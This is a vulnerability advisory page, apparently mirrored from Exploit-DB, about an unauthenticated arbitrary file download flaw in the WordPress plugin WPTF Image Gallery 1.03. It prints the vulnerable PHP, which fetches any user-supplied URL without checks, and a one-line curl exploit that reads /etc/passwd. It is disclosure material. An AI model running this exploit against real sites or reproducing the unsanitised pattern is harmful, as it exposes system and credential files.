Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
exploitdbLarry W. CashdollarEDB-ID:37751
HistoryAug 10, 2015 - 12:00 a.m.

WordPress Plugin WPTF Image Gallery 1.03 - Arbitrary File Download

2015-08-1000:00:00
Larry W. Cashdollar
www.exploit-db.com
27

7.4 High

AI Score

Confidence

Low

JSON
Title: Remote file download vulnerability in wptf-image-gallery v1.03
Author: Larry W. Cashdollar, @_larry0
Date: 2015-07-17
Download Site: https://wordpress.org/plugins/wptf-image-gallery
Vendor: https://profiles.wordpress.org/sakush100/
Vendor Notified: 0000-00-00
Vendor Contact: [email protected]
Description: WordPress True Fullscreen (WPTF) Gallery is a modern gallery plugin that supports true fullscreen and have a lot of features built with it.
Vulnerability:
  The ./wptf-image-gallery/lib-mbox/ajax_load.php code doesn't sanitize user input or check that a user is authorized to download files.  This allows an unauthenticated user to download sensitive system files: 


  1 <?php
  2 error_reporting(0);
  3 $homepage = file_get_contents($_GET['url']);
  4 $homepage = str_replace("script", "mboxdisablescript", $homepage);
  5 $homepage = str_replace("SCRIPT", "mboxdisablescript", $homepage);
  6 echo $homepage;
  7 ?>

CVEID:
OSVDB:
Exploit Code:
  • $ curl http://server/wp-content/plugins/wptf-image-gallery/lib-mbox/ajax_load.php?url=/etc/passwd

7.4 High

AI Score

Confidence

Low

JSON